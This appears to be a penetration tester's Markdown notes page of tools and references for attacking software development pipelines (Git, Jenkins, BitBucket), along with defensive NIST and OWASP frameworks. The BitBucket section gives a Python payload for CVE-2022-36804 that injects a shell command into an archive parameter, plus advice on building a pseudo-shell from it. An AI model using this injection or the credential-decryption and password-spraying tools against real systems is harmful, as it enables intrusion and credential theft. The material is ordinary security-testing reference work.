# SDLC

Anything to can be used to attack SDLC processes.

## Git

- [trufflehog](https://github.com/trufflesecurity/trufflehog)
  - Scour commit history for credentials
  - **WARNING:** The rewrite did away with entropy checks - just use v2 (install with `pip install truffleHog`)
- [gitleaks](https://github.com/zricethezav/gitleaks)
  - SAST tool to detect/prevent credential leakage
- [SCMKit](https://github.com/xforcered/SCMKit)
  - Source Code Managerment Attack Toolkitz

### Framework-Specific Secrets Extraction

- Ruby on Rails
  - [Credentials.yml.enc_Decryptor](https://github.com/mbadanoiu/Credentials.yml.enc_Decryptor)
  - [Expose & Decrypt Ruby on Rails credentials.yml.enc](https://www.daehee.com/decrypt-ruby-on-rails-credentials/)
- [Blacklist3r](https://github.com/NotSoSecure/Blacklist3r)
  - Accumulate secret keys/secret materials (read: pre-published keys) used by devs blindly copy/pasting code
  - Article [here](https://notsosecure.com/project-blacklist3r)

## Jenkins

- [pwn_jenkins](https://github.com/gquere/pwn_jenkins)
  - Toolkit for abusing Jenkins
  - Take note of [jenkins_password_spraying.py](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py)
- [jenkins-credentials-decryptor](https://github.com/hoto/jenkins-credentials-decryptor)
  - Standalone binary for decrypting Jenkins credentials
  - **WARNING:** This may require a patch since valid checksums don't necessarily register as such
- [Week of Continuous Intrusion Tools - Day 1 - Jenkins](https://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-day-1.html)
  - **TODO:** There may be more interesting stuff in this series

## BitBucket

- [CVE-2022-36804](https://nvd.nist.gov/vuln/detail/CVE-2022-36804)
  - Decent writeup [here](https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/)
  - Sample code below. Pretty easy to write a faux "shell" from there.
    - Do note that this truncates output to a single line of text. Just replace newlines with a unique string, whitespace with another, and then translate back after getting the response.
    - Don't forget to:
      - Redirect stderr
      - Error out on shell commands like `clear`, `alias`, etc.
      - Expand more common aliases like `ll`

```python
url = f"{bitbucket_url}/rest/api/latest/projects/{project}/archive"
params = {
  "filename": "whatever",
  "path": "whatever",
  "prefix": "ax" + "\0" + f"--exec=`{command}`" + "\0" + "--remote=origin"
}
```


### Resources

- [Script Execution and Privilege Escalation on Jenkins Server](https://www.labofapenetrationtester.com/2014/08/script-execution-and-privilege-esc-jenkins.html)
  - **NOTE:** endpoint for auth is `/j_acegi_security_check` (prepend `/jenkins`?)
- [Jenkins Security Advisories](https://www.jenkins.io/security/)
  - So many vulns if plugins aren't kept up to date...
- [NIST Secure Software Development Framework](https://csrc.nist.gov/Projects/ssdf)
  - General guidelines for securing the pipeline
- [NIST Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1.pdf)
- [OWASP Software Assurance Maturity Model (SAMM)](https://owasp.org/www-project-samm/)
- [How we Abused Repository Webhooks to Access Internal CI Systems at Scale](https://www.cidersecurity.io/blog/research/how-we-abused-repository-webhooks-to-access-internal-ci-systems-at-scale/)
